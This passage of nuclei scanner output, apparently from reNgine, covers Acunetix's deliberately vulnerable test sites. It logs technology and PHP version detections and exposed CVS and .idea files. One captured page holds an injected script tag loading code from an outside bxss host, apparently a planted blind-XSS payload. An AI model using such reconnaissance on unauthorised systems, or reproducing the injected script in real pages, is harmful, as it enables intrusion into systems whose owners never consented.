--\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:45.738978392Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0' 'http://testhtml5.vulnweb.com/like'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/logout\",\"path\":\"/logout\",\"matched-at\":\"http://testhtml5.vulnweb.com/\",\"request\":\"GET /logout HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:37 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:46.20502456Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' 'http://testhtml5.vulnweb.com/logout'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/php-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/php-detect\",\"template-id\":\"php-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/php-detect.yaml\",\"info\":{\"name\":\"PHP Detect\",\"author\":[\"y0no\"],\"tags\":[\"tech\",\"php\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1,\"vendor\":\"php\",\"product\":\"php\",\"shodan-query\":\"X-Powered-By: PHP\",\"verified\":true},\"classification\":{\"cve-id\":null,\"cwe-id\":null,\"cpe\":\"cpe:2.3:a:php:php:*:*:*:*:*:*:*:*\"}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"extracted-results\":[\"5.6.40\"],\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:43 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:46.362665299Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Repository\",\"path\":\"/CVS/Repository\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Repository\",\"request\":\"GET /CVS/Repository HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 8\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:34:46 GMT\\r\\nEtag: \\\"4dca64a4-8\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\nacupart\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:46.586746707Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0' 'http://testphp.vulnweb.com/CVS/Repository'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries\",\"path\":\"/CVS/Entries\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Entries\",\"request\":\"GET /CVS/Entries HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 5.2; rv:24.0) Gecko/20100101 Firefox/24.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:34:46 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:46.590637461Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:24.0) Gecko/20100101 Firefox/24.0' 'http://testphp.vulnweb.com/CVS/Entries'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/.idea/.name\",\"path\":\"/.idea/.name\",\"matched-at\":\"http://testphp.vulnweb.com/.idea/.name\",\"request\":\"GET /.idea/.name HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 6\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:34:46 GMT\\r\\nEtag: \\\"4f911cd6-6\\\"\\r\\nLast-Modified: Fri, 20 Apr 2012 08:22:46 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\nacuart\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:46.593246293Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15' 'http://testphp.vulnweb.com/.idea/.name'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"path\":\"/CVS/Entries.Log\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"request\":\"GET /CVS/Entries.Log HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:34:46 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:46.601878433Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66' 'http://testphp.vulnweb.com/CVS/Entries.Log'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/php-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/php-detect\",\"template-id\":\"php-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/php-detect.yaml\",\"info\":{\"name\":\"PHP Detect\",\"author\":[\"y0no\"],\"tags\":[\"tech\",\"php\"],\"severity\":\"info\",\"metadata\":{\"verified\":true,\"max-request\":1,\"vendor\":\"php\",\"product\":\"php\",\"shodan-query\":\"X-Powered-By: PHP\"},\"classification\":{\"cve-id\":null,\"cwe-id\":null,\"cpe\":\"cpe:2.3:a:php:php:*:*:*:*:*:*:*:*\"}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com\",\"matched-at\":\"http://testphp.vulnweb.com\",\"extracted-results\":[\"5.6.40\"],\"request\":\"GET / HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:43 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n\\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/main_dynamic_template.dwt.php\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-2\\\"\\u003e\\n\\n\\u003c!-- InstanceBeginEditable name=\\\"document_title_rgn\\\" --\\u003e\\n\\u003ctitle\\u003eHome of Acunetix Art\\u003c/title\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003clink rel=\\\"stylesheet\\\" href=\\\"style.css\\\" type=\\\"text/css\\\"\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"headers_rgn\\\" --\\u003e\\n\\u003c!-- here goes headers headers --\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003cscript language=\\\"JavaScript\\\" type=\\\"text/JavaScript\\\"\\u003e\\n\\u003c!--\\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\\n if (init==true) with (navigator) {if ((appName==\\\"Netscape\\\")\\u0026\\u0026(parseInt(appVersion)==4)) {\\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\\n}\\nMM_reloadPage(true);\\n//--\\u003e\\n\\u003c/script\\u003e\\n\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e \\n\\u003cdiv id=\\\"mainLayer\\\" style=\\\"position:absolute; width:700px; z-index:1\\\"\\u003e\\n\\u003cdiv id=\\\"masthead\\\"\\u003e \\n \\u003ch1 id=\\\"siteName\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/h1\\u003e \\n \\u003ch6 id=\\\"siteInfo\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/h6\\u003e\\n \\u003cdiv id=\\\"globalNav\\\"\\u003e \\n \\t\\u003ctable border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\"\\u003e\\u003ctr\\u003e\\n\\t\\u003ctd align=\\\"left\\\"\\u003e\\n\\t\\t\\u003ca href=\\\"index.php\\\"\\u003ehome\\u003c/a\\u003e | \\u003ca href=\\\"categories.php\\\"\\u003ecategories\\u003c/a\\u003e | \\u003ca href=\\\"artists.php\\\"\\u003eartists\\n\\t\\t\\u003c/a\\u003e | \\u003ca href=\\\"disclaimer.php\\\"\\u003edisclaimer\\u003c/a\\u003e | \\u003ca href=\\\"cart.php\\\"\\u003eyour cart\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"guestbook.php\\\"\\u003eguestbook\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\n\\t\\u003c/td\\u003e\\n\\t\\u003ctd align=\\\"right\\\"\\u003e\\n\\t\\t\\u003c/td\\u003e\\n\\t\\u003c/tr\\u003e\\u003c/table\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\u003c!-- end masthead --\\u003e \\n\\n\\u003c!-- begin content --\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"content_rgn\\\" --\\u003e\\n\\u003cdiv id=\\\"content\\\"\\u003e\\n\\t\\u003ch2 id=\\\"pageName\\\"\\u003ewelcome to our page\\u003c/h2\\u003e\\n\\t \\u003cdiv 